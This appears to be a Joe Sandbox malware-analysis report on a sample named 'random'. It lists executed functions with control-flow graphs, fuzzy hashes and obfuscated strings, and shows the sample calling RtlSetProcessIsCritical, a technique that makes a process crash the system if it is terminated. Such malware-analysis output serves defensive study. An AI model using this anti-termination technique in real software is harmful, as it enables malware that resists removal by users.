                            execution_graph 22017 1511e6b 22018 1511e72 22017->22018 22019 1511e9d 22018->22019 22022 553a100 22018->22022 22026 553a0f0 22018->22026 22023 553a11c 22022->22023 22030 5537584 22023->22030 22027 553a100 22026->22027 22028 5537584 RtlSetProcessIsCritical 22027->22028 22029 553a169 22028->22029 22029->22019 22031 553a598 RtlSetProcessIsCritical 22030->22031 22033 553a169 22031->22033 22033->22019

                            Executed Functions

                            Function 055375D8 Relevance: 9.3, Strings: 7, Instructions: 524COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 738 55375d8-553765c 747 5537662-5537700 call 55331b0 call 5536e20 call 5537148 call 5536dd8 738->747 748 5537707-5537733 738->748 747->748 752 55377a4-55377ad 748->752 754 5537735-5537738 752->754 755 55377af-55377b9 752->755 757 5537744-5537747 754->757 758 553773a-5537742 754->758 759 55377bb-55377c5 755->759 760 55377d9 755->760 761 553774a-5537753 757->761 758->761 762 55377d0-55377d7 759->762 763 55377c7-55377ce 759->763 764 55377e0-553796f call 5537190 call 5536dd8 call 5536e20 760->764 766 5537759-553777c call 5536e68 call 5537100 761->766 767 5537a1f-5537a47 761->767 762->764 763->764 879 5537971-5537977 764->879 880 55379ac-5537a1e 764->880 766->767 780 5537782-553778b 766->780 773 5537a49-5537a6b 767->773 774 5537a6d-5537a7d 767->774 785 5537a80-5537a89 773->785 774->785 895 553778d call 55375d8 780->895 896 553778d call 55375c8 780->896 786 5537aab-5537ab3 785->786 787 5537a8b-5537a91 785->787 792 5537a93-5537aa9 787->792 793 5537ab4-5537af1 787->793 790 5537793-5537795 795 55377a0-55377a1 790->795 796 5537797-5537799 790->796 792->786 792->787 808 5537af7-5537b73 793->808 809 5537b78-5537b97 793->809 795->752 796->795 851 5537c5b-5537c62 808->851 818 5537b99-5537bd9 809->818 819 5537bde-5537be9 809->819 818->851 826 5537beb-5537bf1 819->826 827 5537c0a 819->827 826->827 830 5537bf3-5537bf6 826->830 834 5537c13-5537c26 827->834 830->827 832 5537bf8-5537bfb 830->832 832->827 836 5537bfd-5537c00 832->836 834->851 836->827 839 5537c02-5537c08 836->839 839->827 842 5537c28-5537c2a 839->842 847 5537c33-5537c35 842->847 848 5537c2c-5537c2f 842->848 847->851 849 5537c31-5537c59 848->849 850 5537c37-5537c57 848->850 849->851 850->851 879->767 881 553797d-5537987 879->881 881->767 883 553798d-553799b 881->883 886 55379a6-55379aa 883->886 887 553799d-553799f 883->887 886->879 886->880 887->886 895->790 896->790
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2009434991.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5530000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID: "Ct$"Ct$"Ct$"Ct$"Ct$(;t$^Ct
                            • API String ID: 0-2759278041
                            • Opcode ID: bc4420672530f81f74626477c1f4a9196996adf93425c231b5c67f1c90eb0d77
                            • Instruction ID: 4835a1bb667cd302d08607df8ea171370177f99500f71654ff5a4165d9482992
                            • Opcode Fuzzy Hash: bc4420672530f81f74626477c1f4a9196996adf93425c231b5c67f1c90eb0d77
                            • Instruction Fuzzy Hash: AE124874B102098FDB15DFA8D995A6EBBF6FF8C200B108569D40AAB791DF34ED05CB90
                            Function 0553F698 Relevance: 1.6, Strings: 1, Instructions: 354COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1010 553f698-553f73d 1012 553f7b9-553f7c7 1010->1012 1013 553f73f-553f766 1010->1013 1014 553f7ca-553f892 1012->1014 1013->1012 1017 553f768-553f77c 1013->1017 1030 553f894-553f8bb 1014->1030 1031 553f90b-553f919 1014->1031 1020 553f79f-553f7b7 1017->1020 1021 553f77e-553f788 1017->1021 1020->1014 1023 553f78a 1021->1023 1024 553f78c-553f79b 1021->1024 1023->1024 1024->1024 1025 553f79d 1024->1025 1025->1020 1030->1031 1034 553f8bd-553f8d1 1030->1034 1032 553f91c-553f950 1031->1032 1036 553f952-553f979 1032->1036 1037 553f9c9-553f9d7 1032->1037 1041 553f8d3-553f8dd 1034->1041 1042 553f8f4-553f909 1034->1042 1036->1037 1043 553f97b-553f98f 1036->1043 1039 553f9da-553fa48 1037->1039 1052 553fa4d-553fa5e 1039->1052 1044 553f8e1-553f8f0 1041->1044 1045 553f8df 1041->1045 1042->1032 1050 553f9b2-553f9c7 1043->1050 1051 553f991-553f99b 1043->1051 1044->1044 1047 553f8f2 1044->1047 1045->1044 1047->1042 1050->1039 1053 553f99f-553f9ae 1051->1053 1054 553f99d 1051->1054 1055 553fa60-553fa66 1052->1055 1056 553fa67-553fb2b 1052->1056 1053->1053 1057 553f9b0 1053->1057 1054->1053 1055->1056 1066 553fb3b-553fb3f 1056->1066 1067 553fb2d-553fb31 1056->1067 1057->1050 1069 553fb41-553fb45 1066->1069 1070 553fb4f-553fb53 1066->1070 1067->1066 1068 553fb33 1067->1068 1068->1066 1069->1070 1071 553fb47 1069->1071 1072 553fb63-553fb67 1070->1072 1073 553fb55-553fb59 1070->1073 1071->1070 1075 553fb77-553fb7b 1072->1075 1076 553fb69-553fb6d 1072->1076 1073->1072 1074 553fb5b 1073->1074 1074->1072 1077 553fb8b-553fb8f 1075->1077 1078 553fb7d-553fb81 1075->1078 1076->1075 1079 553fb6f 1076->1079 1081 553fb91-553fb95 1077->1081 1082 553fb9f 1077->1082 1078->1077 1080 553fb83 1078->1080 1079->1075 1080->1077 1081->1082 1083 553fb97 1081->1083 1084 553fba0 1082->1084 1083->1082 1084->1084
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2009434991.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5530000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID: \Vrn
                            • API String ID: 0-2142071343
                            • Opcode ID: 366f145bcd74aaf1ad24169661a11c8aaf7ebd276af4afce99fda3cb97d41020
                            • Instruction ID: 5adaa225b6fd77bc640ff5e8d50ee50195c62ee25342e0e73d54d7c943b83165
                            • Opcode Fuzzy Hash: 366f145bcd74aaf1ad24169661a11c8aaf7ebd276af4afce99fda3cb97d41020
                            • Instruction Fuzzy Hash: 44E1E370D00318DFEB24DFA9C895BDEBBB1BF49300F1085AAD409A7290EB749A85CF55
                            Function 0151E970 Relevance: .5, Instructions: 530COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1593 151e970-151e9a4 1596 151e9b2-151e9c5 1593->1596 1597 151e9a6-151e9af 1593->1597 1598 151ec35-151ec39 1596->1598 1599 151e9cb-151e9ce 1596->1599 1597->1596 1602 151ec3b-151ec4b 1598->1602 1603 151ec4e-151ec58 1598->1603 1600 151e9d0-151e9d5 1599->1600 1601 151e9dd-151e9e9 1599->1601 1600->1601 1605 151ec73-151ecb9 1601->1605 1606 151e9ef-151ea01 1601->1606 1602->1603 1615 151ecc8-151ecf0 1605->1615 1616 151ecbb-151ecc5 1605->1616 1610 151ea07-151ea5a 1606->1610 1611 151eb6d-151eb7b 1606->1611 1641 151ea6a 1610->1641 1642 151ea5c-151ea68 call 151e6a8 1610->1642 1617 151eb81-151eb8f 1611->1617 1618 151ec00-151ec02 1611->1618 1636 151ee45-151ee63 1615->1636 1637 151ecf6-151ed0f 1615->1637 1616->1615 1620 151eb91-151eb96 1617->1620 1621 151eb9e-151ebaa 1617->1621 1622 151ec10-151ec13 1618->1622 1623 151ec04-151ec0a 1618->1623 1620->1621 1621->1605 1628 151ebb0-151ebdf 1621->1628 1747 151ec16 call 151e970 1622->1747 1748 151ec16 call 151ec80 1622->1748 1749 151ec16 call 151eea7 1622->1749 1750 151ec16 call 151e95f 1622->1750 1626 151ec0c 1623->1626 1627 151ec0e 1623->1627 1626->1622 1627->1622 1647 151ebe1-151ebee 1628->1647 1648 151ebf0-151ebfe 1628->1648 1630 151ec1c 1633 151ec1e-151ec2f 1630->1633 1633->1598 1633->1599 1654 151ee65-151ee87 1636->1654 1655 151eece-151eed8 1636->1655 1657 151ed15-151ed2b 1637->1657 1658 151ee26-151ee3f 1637->1658 1645 151ea6c-151ea7c 1641->1645 1642->1645 1659 151ea97-151ea99 1645->1659 1660 151ea7e-151ea95 1645->1660 1647->1648 1648->1598 1674 151eed9-151ef2a call 151a718 1654->1674 1675 151ee89-151eea5 1654->1675 1657->1658 1679 151ed31-151ed7f 1657->1679 1658->1636 1658->1637 1664 151eae2-151eae4 1659->1664 1665 151ea9b-151eaa9 1659->1665 1660->1659 1666 151eaf2-151eb02 1664->1666 1667 151eae6-151eaf0 1664->1667 1665->1664 1673 151eaab-151eabd 1665->1673 1680 151eb04-151eb12 1666->1680 1681 151eb2d-151eb33 call 151f2c8 1666->1681 1667->1666 1682 151eb3b-151eb47 1667->1682 1688 151eac3-151eac7 1673->1688 1689 151eabf-151eac1 1673->1689 1713 151ef4a-151ef5f call 1519458 * 2 1674->1713 1714 151ef2c-151ef48 call 1519dc0 1674->1714 1692 151eec9-151eecc 1675->1692 1724 151ed81-151eda7 1679->1724 1725 151eda9-151edcd 1679->1725 1694 151eb25-151eb28 1680->1694 1695 151eb14-151eb23 1680->1695 1690 151eb39 1681->1690 1682->1633 1699 151eb4d-151eb68 1682->1699 1697 151eacd-151eadc 1688->1697 1689->1697 1690->1682 1692->1655 1693 151eeb3-151eeb6 1692->1693 1693->1674 1701 151eeb8-151eec8 1693->1701 1694->1598 1695->1682 1697->1664 1707 151ec59-151ec6c 1697->1707 1699->1598 1701->1692 1707->1605 1723 151ef64-151ef88 call 1519458 1713->1723 1714->1713 1724->1725 1736 151edff-151ee18 1725->1736 1737 151edcf-151ede6 1725->1737 1739 151ee23 1736->1739 1740 151ee1a 1736->1740 1743 151edf2-151edfd 1737->1743 1744 151ede8-151edeb 1737->1744 1739->1658 1740->1739 1743->1736 1743->1737 1744->1743 1747->1630 1748->1630 1749->1630 1750->1630
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 68601f41d8231c098612489ed64aa690cc6a408a18d405c62c9cfb68e939f028
                            • Instruction ID: 03588cafa323983d58da9256337d5f5e36d2d27334b8c9fa9eec282315422727
                            • Opcode Fuzzy Hash: 68601f41d8231c098612489ed64aa690cc6a408a18d405c62c9cfb68e939f028
                            • Instruction Fuzzy Hash: 6C127134B002158FE716DF69C894AAEBBF6FF88710B148569D906EB365DB31DC41CBA0
                            Function 06B54788 Relevance: .5, Instructions: 516COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1751 6b54788-6b54789 1752 6b54796-6b54799 1751->1752 1753 6b5478b-6b5478d 1751->1753 1755 6b5479a-6b547c9 1752->1755 1754 6b5478f-6b54794 1753->1754 1753->1755 1754->1752 1756 6b547d0-6b548b1 call 6b5350c call 6b5351c 1755->1756 1757 6b547cb 1755->1757 1763 6b548b7-6b5497c call 6b5352c 1756->1763 1764 6b54edc-6b54f46 call 6b5353c call 6b54388 1756->1764 1757->1756 1794 6b54982-6b54a3b 1763->1794 1795 6b54bcd-6b54c5c 1763->1795 1773 6b54f80-6b54fcd call 6b54394 1764->1773 1774 6b54f48-6b54f78 1764->1774 1786 6b55007-6b5504a call 6b543a0 call 6b543ac 1773->1786 1787 6b54fcf-6b54fff 1773->1787 1774->1773 1798 6b5504c-6b55053 1786->1798 1787->1786 1815 6b54a8d-6b54ada 1794->1815 1816 6b54a3d-6b54a87 1794->1816 1817 6b54c62-6b54c7a 1795->1817 1818 6b54cfa-6b54d0f 1795->1818 1801 6b55055-6b55061 1798->1801 1802 6b55062 1798->1802 1801->1802 1828 6b54ae0-6b54b86 1815->1828 1829 6b54b8b-6b54bc2 1815->1829 1816->1815 1823 6b54d14-6b54d6c 1817->1823 1824 6b54c80-6b54c98 1817->1824 1825 6b54ea7 1818->1825 1823->1825 1824->1823 1834 6b54c9a-6b54cb2 1824->1834 1832 6b54eb2-6b54ed7 1825->1832 1828->1798 1829->1795 1832->1798 1842 6b54d71-6b54dc9 1834->1842 1843 6b54cb8-6b54cd0 1834->1843 1842->1825 1848 6b54cd6-6b54cee 1843->1848 1849 6b54dce-6b54e26 1843->1849 1854 6b54cf4-6b54e9c 1848->1854 1855 6b54e2b-6b54e53 1848->1855 1849->1825 1854->1825 1855->1825
                            Memory Dump Source
                            • Source File: 00000001.00000002.2010624273.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b50000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b0948ff67c7a3946ee7570a80a9bad9ccce31cd133557fc7873806c8929de8ee
                            • Instruction ID: 0d43992a7eb2a95baf9003a4cf35632ad41a12ad42e370814544324f6af3b86d
                            • Opcode Fuzzy Hash: b0948ff67c7a3946ee7570a80a9bad9ccce31cd133557fc7873806c8929de8ee
                            • Instruction Fuzzy Hash: 7332B074E01229CFDB68DF65C890BEDBBB2BB89300F1095E9D509AB250DB359E85CF50
                            Function 06B53918 Relevance: .4, Instructions: 418COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2136 6b53918-6b53949 2137 6b53950-6b53aa3 2136->2137 2138 6b5394b 2136->2138 2149 6b53aa5-6b53aac 2137->2149 2150 6b53b04-6b53b0b 2137->2150 2138->2137 2153 6b53ad1-6b53ad8 2149->2153 2154 6b53aae-6b53ab5 2149->2154 2151 6b53b0d-6b53b14 2150->2151 2152 6b53b2c-6b53b33 2150->2152 2155 6b53b16-6b53b20 2151->2155 2156 6b53b5b-6b53b73 2151->2156 2157 6b53b35-6b53b3f 2152->2157 2158 6b53b7f-6b53b97 2152->2158 2161 6b53bc7-6b53bdf 2153->2161 2162 6b53ade-6b53ae8 2153->2162 2159 6b53ca5-6b53cc3 2154->2159 2160 6b53abb-6b53ac5 2154->2160 2169 6b53b26-6b53b27 2155->2169 2170 6b53ba3-6b53bbb 2155->2170 2187 6b53ccf-6b53cf1 2156->2187 2188 6b53b79-6b53b7a 2156->2188 2171 6b53b45-6b53b4f 2157->2171 2172 6b53c81-6b53c99 2157->2172 2179 6b53d11-6b53d33 2158->2179 2180 6b53b9d-6b53b9e 2158->2180 2181 6b53fc6-6b53fe0 2159->2181 2182 6b53cc9-6b53cca 2159->2182 2173 6b53beb-6b53c09 2160->2173 2174 6b53acb-6b53acc 2160->2174 2185 6b53be5-6b53be6 2161->2185 2186 6b53e0c-6b53e28 2161->2186 2177 6b53aee-6b53af8 2162->2177 2178 6b53c39-6b53c51 2162->2178 2183 6b53ffa-6b54000 2169->2183 2206 6b53bc1-6b53bc2 2170->2206 2207 6b53d53-6b53d8a 2170->2207 2193 6b53b55-6b53b56 2171->2193 2194 6b53c5d-6b53c75 2171->2194 2202 6b53f92 2172->2202 2203 6b53c9f-6b53ca0 2172->2203 2209 6b53c0f-6b53c10 2173->2209 2210 6b53e48-6b53e6d 2173->2210 2174->2183 2190 6b53c15-6b53c2d 2177->2190 2191 6b53afe-6b53aff 2177->2191 2199 6b53c57-6b53c58 2178->2199 2200 6b53ec1-6b53f39 2178->2200 2219 6b53d35-6b53d43 2179->2219 2220 6b53d48-6b53d4e 2179->2220 2180->2183 2215 6b53ff2-6b53ff8 2181->2215 2216 6b53fe2-6b53ff0 2181->2216 2182->2183 2197 6b54002-6b5400b 2183->2197 2185->2183 2213 6b53e3d-6b53e43 2186->2213 2214 6b53e2a-6b53e38 2186->2214 2217 6b53d06-6b53d0c 2187->2217 2218 6b53cf3-6b53d01 2187->2218 2188->2183 2222 6b53c33-6b53c34 2190->2222 2223 6b53e8d-6b53ea1 2190->2223 2191->2183 2193->2183 2224 6b53f54-6b53f7a 2194->2224 2225 6b53c7b-6b53c7c 2194->2225 2199->2183 2200->2197 2250 6b53f98 call 6b540b0 2202->2250 2251 6b53f98 call 6b5429f 2202->2251 2203->2183 2206->2183 2229 6b53d91-6b53dba 2207->2229 2230 6b53d8c 2207->2230 2209->2183 2233 6b53e82-6b53e88 2210->2233 2234 6b53e6f-6b53e7d 2210->2234 2213->2197 2214->2197 2215->2197 2216->2197 2217->2197 2218->2197 2219->2197 2220->2197 2222->2183 2239 6b53eb6-6b53ebc 2223->2239 2240 6b53ea3-6b53eb1 2223->2240 2224->2197 2225->2183 2226 6b53f9e-6b53fac 2231 6b53fbe-6b53fc4 2226->2231 2232 6b53fae-6b53fbc 2226->2232 2242 6b53dc1-6b53dec 2229->2242 2243 6b53dbc 2229->2243 2230->2229 2231->2197 2232->2197 2233->2197 2234->2197 2239->2197 2240->2197 2246 6b53e01-6b53e07 2242->2246 2247 6b53dee-6b53dfc 2242->2247 2243->2242 2246->2197 2247->2197 2250->2226 2251->2226
                            Memory Dump Source
                            • Source File: 00000001.00000002.2010624273.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b50000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 413054d075a510b5c8eb931fa7fbf7e8df7550a6bed4b509eb5dc9d2e530d7b2
                            • Instruction ID: 6c6c563f1b3e7d8926513d125b6ee63dea8dc3f42238e9eefbe6e4cc76d37f92
                            • Opcode Fuzzy Hash: 413054d075a510b5c8eb931fa7fbf7e8df7550a6bed4b509eb5dc9d2e530d7b2
                            • Instruction Fuzzy Hash: 770225B4D05268CFEBA4CF65C8447ECBBF5FB49340F1590A9D80AAB251EB755980CF50
                            Function 05531298 Relevance: .4, Instructions: 418COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2038 5531298-55312b0 2040 55312b2-55312bb 2038->2040 2041 55312ea-5531309 2038->2041 2042 55312bd-55312cd 2040->2042 2043 553130c-553138d 2040->2043 2045 55312d5-55312d7 2042->2045 2052 5531393-553139f 2043->2052 2053 55315a0-55315c4 2043->2053 2047 55312e1-55312e7 2045->2047 2048 55312d9-55312de 2045->2048 2047->2041 2054 55313a5-55313bc 2052->2054 2055 553172f-553176a 2052->2055 2059 55316f1-55316f5 2053->2059 2060 55315ca-55315ce 2053->2060 2054->2053 2063 55313c2-5531406 2054->2063 2073 5531784-553179b 2055->2073 2074 553176c-5531783 2055->2074 2061 5531723-553172c 2059->2061 2062 55316f7-55316fb 2059->2062 2064 55315d4-55315da 2060->2064 2065 553168c-5531692 2060->2065 2062->2061 2066 55316fd-553171e 2062->2066 2091 5531416 2063->2091 2092 5531408-5531414 2063->2092 2070 55315f3-553167c 2064->2070 2071 55315dc-55315e0 2064->2071 2067 55316e5-55316ee 2065->2067 2068 5531694-55316da 2065->2068 2066->2061 2080 5531720 2066->2080 2068->2067 2070->2067 2110 553167e-553168a 2070->2110 2071->2065 2075 55315e6-55315ed 2071->2075 2075->2065 2075->2070 2080->2061 2093 5531418-5531428 2091->2093 2092->2093 2097 5531467-55314ab 2093->2097 2098 553142a-5531431 2093->2098 2115 55314bb 2097->2115 2116 55314ad-55314b9 2097->2116 2100 5531433-5531449 2098->2100 2101 553144b-5531452 2098->2101 2102 5531455-5531457 2100->2102 2101->2102 2102->2097 2106 5531459-553145d 2102->2106 2106->2097 2108 553145f-5531462 2106->2108 2111 5531596-553159a 2108->2111 2110->2067 2111->2052 2111->2053 2117 55314bd-55314cd 2115->2117 2116->2117 2120 55314d3-55314d9 2117->2120 2121 55314cf-55314d1 2117->2121 2122 55314e1-55314e3 2120->2122 2121->2122 2123 5531593 2122->2123 2124 55314e9-55314ef 2122->2124 2123->2111 2125 5531587-5531590 2124->2125 2126 55314f5-5531579 2124->2126 2126->2125 2135 553157b-553157e 2126->2135 2135->2125
                            Memory Dump Source
                            • Source File: 00000001.00000002.2009434991.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5530000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 533c2e107b0c14be5a7f9e1e9b68ef24c09e6d5f872d097341fe89c31ce64cba
                            • Instruction ID: f1de0c1be10df3099ac139eec8a2b336ccb4ea74940ec1464a8339f3d3de23b1
                            • Opcode Fuzzy Hash: 533c2e107b0c14be5a7f9e1e9b68ef24c09e6d5f872d097341fe89c31ce64cba
                            • Instruction Fuzzy Hash: 6CF1A371A006099FDB15DFA4D885BAEBBF2FF88314F148569E509EB291DB30EC45CB90
                            Function 06B51278 Relevance: .4, Instructions: 387COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2010624273.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b50000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2be9d22fe78bd3c397a4960fbd22c40f758d15f95411ec6eaed308564005a6c8
                            • Instruction ID: 01b9fbb917db4296d6712bf6867273cc65036dc551ed0a57def024387c834da8
                            • Opcode Fuzzy Hash: 2be9d22fe78bd3c397a4960fbd22c40f758d15f95411ec6eaed308564005a6c8
                            • Instruction Fuzzy Hash: E2F1D3B4D00219CFEB60DFA8C885BDDBBF1BF49304F1095AAD809A7250EB749A85CF55
                            Function 01511390 Relevance: .4, Instructions: 379COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ed77ae0697b3cbd94d8e360bc546535e28536f88e05ff336ab48f584b1a22b60
                            • Instruction ID: c2184db43e1e03dbae4a779c08013210753ae2f5203170fcbbfa3aa45c27aef6
                            • Opcode Fuzzy Hash: ed77ae0697b3cbd94d8e360bc546535e28536f88e05ff336ab48f584b1a22b60
                            • Instruction Fuzzy Hash: 2012B174A01229CFEB25DF64E888B9DBBB2FB49300F1085E9D909A7354DB749E81CF51
                            Function 01513010 Relevance: .3, Instructions: 340COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fbb6496861854d843418500138ef934591d7f05ee9bd4e54b619d30400ac6488
                            • Instruction ID: 2d2e21348c5057d85e08229d566e3f40b83dd02314c23aa8eaefb45736583d3d
                            • Opcode Fuzzy Hash: fbb6496861854d843418500138ef934591d7f05ee9bd4e54b619d30400ac6488
                            • Instruction Fuzzy Hash: D5F1BD74E002188FEB65DF69D994BDDBBB2FF88300F1081AA9909AB355DB355E81CF50
                            Function 06B534DF Relevance: .2, Instructions: 243COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2010624273.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b50000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 44c8d5401a53144a6b38e74bdf7193644e3cf263e58a1c9498091fde6ce489d3
                            • Instruction ID: eeeef4938b8d8938ed3752a1118937ac3a4211e0eca34ef3b82316eccab4fbf4
                            • Opcode Fuzzy Hash: 44c8d5401a53144a6b38e74bdf7193644e3cf263e58a1c9498091fde6ce489d3
                            • Instruction Fuzzy Hash: 5CA1A274E01218CFDB54DFA9D894A9DBBB2FF89300F2181AAD849AB365DB319845CF50
                            Function 06B53550 Relevance: .2, Instructions: 207COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2010624273.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b50000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 276d7cd83e3edbbc376e3356ee89f44788e3c59b0fd4adf3ed56c2411f2a36b1
                            • Instruction ID: 1d57431eb341b798626f6a314cf1ae7255e705223e26236aa4c24244c96fefe7
                            • Opcode Fuzzy Hash: 276d7cd83e3edbbc376e3356ee89f44788e3c59b0fd4adf3ed56c2411f2a36b1
                            • Instruction Fuzzy Hash: 48918274E00218CFDB54DFA9D994A9DBBF2FF89300F219169E819AB365DB31A841CF50
                            Function 05538828 Relevance: .2, Instructions: 193COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2009434991.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5530000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 199445ac9e436e7a40d697d6138d5c77ba30444c37bae9b0bad119370fe6c4de
                            • Instruction ID: 3d6eefc5df90d88873c0a4663967a8974018bf9ddb1b1511bb49a559a482b5d0
                            • Opcode Fuzzy Hash: 199445ac9e436e7a40d697d6138d5c77ba30444c37bae9b0bad119370fe6c4de
                            • Instruction Fuzzy Hash: BD514F34B102099BD708EBBAD8907AE77F7BFCC740F648428D105AB394DE799C0597A0
                            Function 01512DE8 Relevance: .1, Instructions: 72COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 16a9596751b826d4b3894e86d7fcab98d06c04853c6fcf24cd62f6b55d13bb5c
                            • Instruction ID: a7c3205be83354ad81c80296c9dce4eb2e54561046b5b028102cabc915d61c5a
                            • Opcode Fuzzy Hash: 16a9596751b826d4b3894e86d7fcab98d06c04853c6fcf24cd62f6b55d13bb5c
                            • Instruction Fuzzy Hash: 13212571D01209DFEB04DFA9D8906EDBBF2BF89310F149629D424BB290DB356941CF64
                            Function 0151A8C8 Relevance: 9.5, Strings: 5, Instructions: 3209COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 151a8c8-151a8db 1 151a8de-151a902 0->1 3 151aa48-151aa86 1->3 4 151a908-151a91b 1->4 15 151aa8f-151df6f 3->15 5 151a921-151a924 4->5 6 151aa30-151aa3a 4->6 9 151a927-151a941 5->9 6->1 7 151aa40-151aa47 6->7 9->6 12 151a947-151a949 9->12 13 151a963-151a970 12->13 14 151a94b-151a961 12->14 19 151a973-151a9c7 call 1519c40 13->19 14->19 729 151dfb9-151dfc0 15->729 31 151a9c9-151a9d6 19->31 32 151a9d8 19->32 34 151a9da-151a9e8 31->34 32->34 38 151aa17 34->38 39 151a9ea-151aa15 call 151a1f8 34->39 41 151aa1a-151aa2a 38->41 39->41 41->6 41->9 730 151df71-151df88 729->730 731 151dfc2-151dfc7 729->731 732 151dfc8-151dffa 730->732 733 151df8a-151dfb6 730->733 733->729
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2007807363.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1510000_random.jbxd
                            Similarity
                            • API ID:
                            • String ID: (:<t$09<t$H;<t$Ld<t$:<t
                            • API String ID: 0-3123518023
                            • Opcode ID: 6d66b615b6161dec1649b81c3a75606d29110e2bdecf5cb9a61509344448ad4e
                            • Instruction ID: 8eeaa499d72d3d9eb18923de50ad7a9e1d2d234167a867235033b7e7945f6b11
                            • Opcode Fuzzy Hash: 6d66b615b6161dec1649b81c3a75606d29110e2bdecf5cb9a61509344448ad4e
                            • Instruction Fuzzy Hash: 0D633E70A40219AFEB26AB90CC54BED77B6FF89740F1040E9E6097B2D0CA756E94CF15
                            Function 0553A547 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 897 553a547-553a5d8 901 553a5e0-553a65f RtlSetProcessIsCritical 897->901 902 553a661 901->902 903 553a666-553a69f 901->903 902->903
                            APIs
                            • RtlSetProcessIsCritical.NTDLL(?,?,00000000), ref: 0553A64F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2009434991.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5530000_random.jbxd
                            Similarity
                            • API ID: CriticalProcess
                            • String ID: m
                            • API String ID: 2695349919-3775001192
